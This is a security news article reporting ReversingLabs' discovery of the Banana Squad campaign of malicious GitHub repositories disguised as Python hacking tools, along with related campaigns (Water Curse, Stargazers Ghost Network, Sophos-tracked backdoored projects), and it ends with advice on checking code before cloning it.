Banana Squad Returns With a Fresh Batch of Booby-Trapped Repositories

Security analysts at ReversingLabs say they have uncovered a new surge of activity by a group they call Banana Squad. The actors have opened and maintained more than 67 GitHub projects that pretend to contain handy Python hacking tools. Instead, anyone who downloads the code receives a hidden payload that can steal personal data and open a backdoor on Windows machines. The discovery echoes a 2023 incident in which the same crew slipped poisoned packages into the Python Package Index, racking up more than 75,000 downloads before the scheme came to light.

Game Cheats and “Account Cleaners” Reel In Victims

The crooks are banking on the curiosity of people looking for quick wins online, whether that means removing old Discord files, grabbing rare TikTok handles, or finding exploits for Fortnite. Searches for phrases such as “Fortnite External Cheat,” “PayPal bulk account checker,” and “Discord account cleaner” often point users toward the malicious projects. Once the victim installs the code, a silent downloader fetches extra scripts that can tamper with cryptocurrency wallets like Exodus and ship all the harvested data to an external server controlled by the attackers.

Although GitHub has now pulled the poisoned repositories, ReversingLabs warns that copy-cat projects can pop up at any time. Robert Simmons, a threat researcher with the firm, notes that mischief makers are “leaning hard on public code hosts as a free delivery network,” underscoring the need for developers to read the source and verify each download.

GitHub Becomes a Prime Launchpad for Malware

Banana Squad is far from alone. Over the past few months, other threat groups have treated GitHub like a ready-made content delivery network. Researchers at Trend Micro recently flagged 76 separate projects tied to a group nicknamed Water Curse. Their staged payloads swipe passwords, browser cookies, and other session data while planting tools that let the attackers slip back into the computer later.

Another investigation by Check Point shone a light on the so-called Stargazers Ghost Network. That operation spins up batches of ghost accounts—profiles that look real on the surface, complete with stars, forks, and frequent updates—to float Java malware aimed at Minecraft fans. By padding each page with fake popularity signals, the criminals bump their work to the top of GitHub’s search results, giving the lure extra credibility.

A Broader Distribution-as-a-Service Underground

Digging deeper, Check Point and Checkmarx believe the ghost network is only one arm of a larger distribution-as-a-service marketplace, where crooks rent out delivery channels the way legitimate firms rent cloud servers. Sophos backs up that view with its own findings: analysts there tied 133 backdoored GitHub projects to an operation that has been running since mid-2022. Most of those projects concealed malicious code inside Visual Studio build scripts, sneaky Python files, JavaScript snippets, or even doctored screensaver binaries. Once executed, the implants pilfer system information, capture screenshots, and in many cases load well-known remote-access trojans such as AsyncRAT, Remcos, and Lumma Stealer.

Sophos believes the operators push the links through Discord channels and YouTube tutorials that promise easy game hacks or turnkey cyber-attack kits. Inexperienced users who compile the source on their own computers wind up infecting themselves—a twist that turns the criminals’ would-be customers into fresh victims.

Double-Check Before You Clone

The ongoing wave of poisoned repositories shows how software supply-chain attacks have shifted from fringe concern to everyday threat. Whereas companies once worried mainly about tainted browser plug-ins or rogue mobile apps, today’s attackers hide in plain sight on one of the world’s largest development platforms.

ReversingLabs stresses that developers should treat every GitHub project—especially ones offering shortcuts, cheats, or account utilities—with healthy skepticism. Download the code, read through the files, and confirm that each script does exactly what the description claims. Pay special attention to build steps, installer scripts, and any external URLs hard-coded in the source.

GitHub, for its part, has improved automated scanning and takedown procedures, but the sheer volume of new projects means dangerous code can stick around long enough to snare the unwary. Until stronger safeguards take hold, users must remain the final gatekeepers. Just a few minutes spent verifying the integrity of a repository can stop a hidden stealer or backdoor from turning a helpful tool into a costly breach.